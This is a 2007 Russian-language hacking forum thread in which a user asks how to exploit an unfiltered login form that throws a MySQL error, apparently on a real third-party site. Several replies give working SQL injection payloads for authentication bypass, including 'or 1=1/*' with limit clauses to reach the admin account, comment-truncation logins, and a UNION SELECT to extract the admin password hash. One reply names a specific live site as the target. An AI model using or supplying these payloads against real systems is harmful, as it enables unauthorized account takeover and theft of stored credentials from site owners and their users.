HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Sql запрос
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Sql запрос
  #1  
Старый 30.07.2007, 13:12
Marlboro_X
Познающий
Регистрация: 16.10.2006
Сообщений: 44
С нами: 10299047

Репутация: 12
Question Sql запрос
Есть сайт. Есть форма с логином и паролем без фильтрации на символы. Когда ввожу что то типа:
логин: rrr'
пасс: njhj

получаю ошибку

SELECT id FROM Users WHERE login = 'rrr'' AND password = MD5('njhj'); caused error:
Ошибка
Ошибка запроса к базе данных. Попробуйте попытку ещё раз.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'njhj')' at line 1

Направьте в нужное русло все что знал перепробовал. Помогите заюзать багу
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 30.07.2007, 13:13
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
С нами: 10263386

Репутация: 849
По умолчанию
в поле логин or 1=1/*

можно добавить limit 0,1 - тогда скорее всего будет админ
А можно просто rrr/* - юзер будет rrr пароль любой

Имхо...
Последний раз редактировалось Basurman; 30.07.2007 в 13:20..
 
Ответить с цитированием

1
  #3  
Старый 30.07.2007, 13:20
Marlboro_X
Познающий
Регистрация: 16.10.2006
Сообщений: 44
С нами: 10299047

Репутация: 12
По умолчанию 1
or 1=1/* пробовал!
Оно грубо говоря заходит, но без юзера. Пишет даже "Здравствуйте, " и все.
 
Ответить с цитированием

  #4  
Старый 30.07.2007, 13:22
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
С нами: 10263386

Репутация: 849
По умолчанию
пост выше. я дописал туда еще парочку способов - попробуй
 
Ответить с цитированием

  #5  
Старый 30.07.2007, 16:09
everm1nd
Новичок
Регистрация: 20.01.2007
Сообщений: 25
С нами: 10160498

Репутация: 8
По умолчанию
Я бы попробовал:
SELECT id FROM Users WHERE login='admin'--
т.е. login:admin'--
или
SELECT id FROM Users WHERE login='' or id=1--
т.е. login:' or id=1--
Думаю у админа идентификатор единичка, так что прокатит, если что перебери другие.
А может исчо енто поможет:
SELECT id FROM Users WHERE login='' UNION SELECT password FROM Users WHERE id=1--
т.е. login:' UNION SELECT password FROM Users WHERE id=1--
Потом расшифруешь...
А при 1=1 пишет "Здраствуйте, " наверно потому, что идентификатор ноль стоит у гостя, и именно этот пользователь и является первым подходящим под запрос...
 
Ответить с цитированием

  #6  
Старый 30.07.2007, 16:21
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию
Попробуй через подзапрос
Код:
blah' or login=(select login from users limit 0,1)/*
юзеров переключаем первым значением в лимите
__________________
 
Ответить с цитированием

  #7  
Старый 30.07.2007, 16:28
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
С нами: 10263386

Репутация: 849
По умолчанию
http://sevclick.com

оно там не пашет. двойная проверка? хз
имхо ' or 1=1 limit 0,1/* подрубится под амином
Последний раз редактировалось Basurman; 30.07.2007 в 16:31..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.